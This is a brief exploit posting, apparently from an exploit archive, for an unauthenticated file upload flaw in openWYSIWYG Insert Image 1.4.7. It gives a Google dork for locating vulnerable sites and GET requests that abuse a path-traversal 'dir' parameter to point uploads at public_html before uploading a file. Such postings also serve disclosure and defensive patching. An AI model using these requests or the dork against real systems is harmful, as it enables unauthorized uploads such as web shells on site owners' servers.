openWYSIWYG Insert Image 1.4.7 Arbitrary File Upload
Posted on 17 January 2017
# Exploit Title: openWYSIWYG | Insert Image v1.4.7 / Unauthenticated File Upload # Date: 2017-1-15 # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM # Home : http://persian-team.ir/ # Tested on: Windows AND Linux # Telegram Channel : @PersianHackTeam # Google Dork : inurl:/wysiwyg/addons/imagelibrary/ # POC : Unauthenticated File Upload GET /admin/wysiwyg/addons/imagelibrary/select_image.php?pos=1&dir=../../uploads/ You Moust change path To Change Directory to public_html GET /admin/wysiwyg/addons/imagelibrary/select_image.php?pos=1&dir=../../../../ then Upload You File